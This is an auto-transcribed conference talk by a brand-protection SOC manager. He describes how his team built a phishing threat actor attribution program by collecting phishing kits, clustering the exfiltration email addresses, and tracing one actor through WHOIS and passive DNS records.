Knowing the Enemy Creating a Cyber Threat Actor Attribution Program

alright alright good afternoon everybody my name is Jack Johnson and as you can see I'm the manager of the MarkMonitor Security Operations Center MarkMonitor is a brand protection company worldwide and pretty much what my team and I do we might we manage the anti-fraud product so we provide social engineering mitigation for a fortune 500 financial institutions as well as as well as online gaming providers etc this is very weird well it's looted so today I'm gonna talk to you guys about creating a cyber threat actor actor actor bution program and I just want to be clear before I start is that I'm going to talk about two three different aspects the first aspect is the processes that you would

need to do inside of an organization to get this rolling and what I mean by program is there's some authorizations and permissions you need with inside your organization before you can start collecting information from employees etc so this is something anybody recognize what this means but this stuff is Morse code and my former life spent eight years in the United States Navy as a crypto Cryptologic technician and one of pretty much I was a singing operator signals interceptor and been all over the world to six-month Westpac deployments etc but what we would do is we would monitor communications and basically I cop copy Morse code for eight or twelve hours a day every day pretty boring right so to keep her from

getting boring what we would do is we would actually start identifying the person on the other side who's submitting them the Morse code because you would learn their rhythms their patterns their habits because more school is very rhythmic even we could start diagnosing and figuring out if the person is having an off day because you a sick man this guy's slop that like he's driving me nuts you can't tell it did from a DA his dashes are off etc even some people would go even further to start making a scenario site I bet you he was arguing with his wife last night or this guy is drunk again etc too much vodka so if you could think

of what country we're dealing with but this quote that I just translated it's from son zu famous Chinese you know strata Tisch if you know the enemy and you know yourself you need not fear the result of a hundred battles and this is what the focus of our attribution program is identifying the threat actor is what everyone's mind goes to when you say attribution you want to know who he is that's important but what's even more beneficial on a regular basis is understanding their habits and their tactics of how they're launching their attacks and what's their endgame because if you can understand what's their endgame then you know you know where they're weird British where their attack

points are and how to defeat against it that was interesting okay so I like definitions I already went through we're going to talk about a program and what I want to set focus on on the program is the aspect that talked about a set of related measures events and activities what a particularly long term ain't because cyber threat a threat actors hackers whatever you call it they're in this to win it you know I managed 26 analysts since your security operation center we're 24 by 7 365 I've been there since 2004 12 years the social engineering attacks phishing malware fishing he's just going up and I'll show you some stats later to prove that so

whenever I you know on border new analysts I like to tell people that today information security it's not a job it's not a career it's a lifestyle it's something you know I take it home with me I get calls emails 24 hours a day because it doesn't stop we just had the busiest weekend ever because of Black Friday gone into Cyber Monday I mean it's it's really you know explosive so what we did in our organization we pretty much we detect the phishing sites for malware sites when we take them offline but customers always want more right you've never had a customer dissatisfied like man this product hasn't involved in ten years but I'll still love it no

that's not the case so our customers always like can we do something more or one of my customers that I worked with for a long time credit card issuer he's like I wish I know who's behind this stuff I just just wish I knew more about the pert pert so I took that to heart and we started talking and I talked to my management say there is more we can do but it's a thin line between legal and illegal once you start kind of getting into the deep end of the quarter so we went through we got sea level management IT security got authorization from everyone and we say okay that's what we need to do we need to start

collecting information so that we can kind of analyze it and see what's going on and we also extend this out to our customers and offer them additional help but you just need permissions and you need to talk to your legal department to make sure that everything we're doing is clear so that no one's going to get in trouble this is an example of a social engineering attack that was launched against one of the Democratic headquarter of key people for this 2016 election and what you'll notice is that they sent my bitly link that was mimicking a gmail account and there was only two clicks in 2016 this is what you call a spear phishing attack this means

that the first click was the actual threat actor testing the phishing site and the second click was the victim this is how pinpoint accurate their attacks are this is why the attribution aspect is very critical because you don't have a lot of time these days to you know get your hands around the problem they hit and then they get what they want they expose this guy's emails etc here's another example this is what we call the business email compromise or a CEO scam where a cable giant the CFO received an email he transferred 40 million euros I mean this is the kind of impact that will have and when you're speaking to your executive management or your

management in general when you want to invest time is money but if you show them facts and figures like this it kind of gets their air and they're willing to participate so to make it work you need you know permission you gotta put your protocols in place procedures processes and then you have a program I call this two five peas then to make it work this is getting to where I really want to go I had a team of engineers and analysts that we started working together in 2014 we hired a new guy and a couple of other analysts like really leveled up there is studying for their ceh getting into pen test and rainbow tables all this stuff

so we sat together and kind of came up with a new game plan to see if we can start identifying these threat actors by behavioral characteristics and other identical characteristics that we'll be able to identify so social engineering it all starts what we call phishing so I like to ask everyone this what's a fish because whenever I ask someone was the fish I get like it's a like a website or a link that you get or some suspicious where the reality is you're the fish cyber threat actors are trying to snare you and I we're the ones who have the credentials the passwords the usernames the access we have the credit card numbers this is where they're trying to

catch here's some stats so if you look the financial industry can compromises 38% of all social engineering attacks phishing and Malware if this would have been three years ago it would have been maybe 80% and if you notice I speak hosting and retail are taking up a lot of the pie now the reason for this is that ISPs and hosting providers also include email providers a lot of the social engineering attacks today are not brand specific targeting meaning you're not asking for your banking account right up out right out front as much as they used to because today a lot of sites are with your personal email address so this is where the threat actors have pivoted

and now they're going after your personal accounts because if you think about any social networking site that you authenticate on you use your personal email account a lot of banks etc so let's look at these numbers so you see Dropbox in Google in 2014 our Security Operations Center we detected 8 Dropbox sites if you look into 2015 it's you know 50,000 coming in 2016 is almost is over a hundred thousand but look at Google Google exploded because Google has Gmail you have your Google drops you also have your Android devices that authenticate a lot of people are not aware that you can go through the web version of the Google Marketplace or Play Store and install apps onto your

phone this is an avenue for malware infections and most users and even security professionals aren't even aware of this is how these unauthorized third party apps are getting installed it's not that users are going to these websites and installing these apks the threat actors once they have their credentials are installing them themselves and a user will never know that the app was there so what we do is we monitor communication channels this includes email SMS voice over IP etc this is how we monitor their pathways and then we intercept the communications and then we can start building our program we also monitor internal data sources so users are your greatest asset if you build a network of users and they

understand what they should do when they received something suspicious you will be amazed at the amount of data that you can receive and collect on a daily basis also is important for users to know that they shall forward suspicious communications from their personal accounts because this is you know people are checking their Yahoo their Gmail their Facebook their Twitter accounts at work on work machines so you can lock down your corporate environment your exchange server which what have you but there's still different conduits to come in external data sources these are open source intelligence feeds fishtank you have miss accounts you have NGOs aPWG mall you have all these organizations who are collecting all this information that you

can sign up partner with and I'll put you in a part of our data exchange you also have your trusted communities if you're a cyber security professionals today there is definitely strength in numbers you you cannot work in a vacuum or in a silo and be successful because your attacks are probably same as your attacks and I'm saying the same attacks but we're not talking threat actors are definitely talking because they're in the underground forums dark web etc of sharing information so here will we get into the attribute attribution aspect what we notice in so many attacks is that the attackers mostly attacks at the same time so one attack there was a malware actor we noticed that he said

the message is the same time so through research we figured out that there in Mexico through the time that he's active also is a reflection or how much intelligence they have on your organization depending on what time they try to hit you so I'm not a poker player but I like this philosophy so poker is a game based on information availability and what I really took away from this quote by David sesame is that there's poker tails thread actors have tails as well and it can tell you a lot about their skill level etc based on how they conduct their business so you have betting patterns and physical tails you see when you watch the World Series of

Poker all the guys are doing these weird things to obfuscate their behavior because they don't want to know they don't want to reveal when they have a good hand or a bad hand thread actors are doing the same thing it's just in cyberspace so hacker tells behaviors and habits Perry's activity automation so sometimes we'll detect a massive phishing attack where someone puts up 50 phishing sites we take them offline they come back in a minute that threat actor is highly organized and they're automating they also they're monitoring their you know stuff human limitations you know everyone included myself we have resources and personal like my knowledge is a limiting factor but if I partner with you and you're good in a certain

area of technology I can really level up pretty quickly so also the the imagination we look at their resources so today it's very easy to get into a cyber crime because ransomware is a service malware is a service even have fish yet fishing as a service example of a ransomware as the services locky mocky author only takes fifteen percent of the profit where anyone who distributes the locky malware receives 80% of their ransomware 80 to 85 percent and also we look at attack habits so some threat actors they like the pop WordPress sites through the plugins some people break into all CMS systems that's your Joomla your WordPress your drupal we see guys they love breaking in to see panels to

control panels to control servers SQL injections very popular and then PHP web shells andrey directives PHP web cells are awesome because they if you're familiar with the web shell once it's installed it just gives you root access to the box through a web browser alright here's an example of a page P shell and you can see it has permissions and directories you just click and browse it you don't even have to know Linux to do this alright so now I'm get to the parts of you guys really want to hear about so now we're going to get into some attribution in 2014 we teamed up with an investigative group they said that they can identify hackers so I was like

okay I got the perfect guy for you because we have been building not a case but building a database of threat actors and I said this guy is super prolific and I would love to know who he is so we kind of build our database by collecting the social engineering lures because they this is the evidence that they leave behind think of it like we're a crime scene investigator when they send you a malware binary they're exposing themselves because the binary is now in your possession and there's also a lot of forensic evidence in binaries one thing about hackers and social engineering attackers in general they hate whitespace so anytime there's whitespace in a file etc they'll put

something in it sometime you put their name some time they put a certain character sequence or something it's like almost like bubble wrap people cannot resist it and not poppy one thing I want to caution against is collecting too much information you what I did I know I'm like kind of contradicting myself because I said you need all the information you can but you have to organize it or you'll be overwhelmed if you say in the next example these are fishing kits that we collected from a threat actor just for two days the individual this is how busy he is so collected the files extract them and I looked through all the text file search story I just do a grep I'm

not mainly looking through but we find common strings and one common screen that popped out is he was kind enough to tell us who created it because he wants props and also once the user hit submit the email addresses goes here this is very important this line right there created by it's evidence but it's not as damning or identifiable as the email address because the email address is where he's going to receive the stolen credentials so from attack - attack - attack if you see that's the same it's the same threat actor I don't think they're sharing email accounts to do this stuff so once I built up enough of these examples I put into a spreadsheet and this is

truncated the spreadsheet is thousands of rows and what jumped out at me is that through all of these entries there's a couple email addresses these are all the same thig and excellent this one was different and then this one at the bottom is different and if you look at the file name to use they're all the same and suffer this example in this example so with that shouldest is that he has at the time three unique fish kits that he's using the one with Luke PHP is the prevalent one next I put it into multi go individual graph of it and what this shows you is that there's two different brands the first one is a major shipping

organization and the second one was Yahoo so we saw that he actually pivoted out and this guy was he was attacking he targets all the major shipping organizations but then we noticed he's targeting Yahoo this was 2014 around October so this is where we start seeing a shift into the free mail email accounts so this was the beginning of where we started saying it the red balls these were these are incident IDs because there's a customer so we actually created tickets and enforced on them the yellow row is part of the unique URLs and then you see the fishcage so we saw clusters I don't know if you guys use Montego and at the bottom those

are the three unique emails of where he was shipping the data so through all this information we were able to use investigative tools to try to see now that we have all this information can we attribute them so we use central ops or domain tools I don't know if you guys are familiar but you can look up who is records network who is records DNS servers records a passive DNS passive DNS is great because you can look up historical who has records because I meant to include an example just yesterday one of my analysts came up and said I think I got another threat actor because what he noticed is that the Whois record for a domain that was

registered a lookalike domain where it's like Google with three olds etc someone had registered it and sent out phishing message messages but then we noticed that the Whois went private so I say the guy must have slipped up when he first registered the domain and then it changed the private but through passive DNS or any kind of historical Whois record system you can look at it clear and accurate our tech services that allow you to basically it's not like a background check on a person but you can look up search on people and Spokeo is a free is not a free version but it's a cheaper version of the same thing clear is what I use for this investigation

because we were parted Thomson Reuters at the time and it's a top seller orders investigative services product and this is the guys who came and told me they could do it so this is hacker dread we were able to fully identify everything about him he's a Nigerian national we have his date of birth we got his Facebook account Twitter account LinkedIn account and we've been able to successfully do this on multiple numerous threat actors again and again because once we built the program and put everything in place to make sure that now we have the information coming in we're organizing the information and structure into a database and now we can query we can see the prominent threat

actors and who's the big targets would go after them and it's it's like one two three now at one point people thought it was impossible to go after these Nigerians because they're in Nigeria the Nigerian government through efforts with law enforcement the FBI primarily step their game up resulting in August first you see this the end of the 60 million dollar scam voila that's where we're going what we need to do is make ourself a hard target being it they put these sites up they're sending malware shut them down immediately let them know that you're not just going to take it then we need to go after them and take them offline permanently that's it anybody got any

questions alright thank you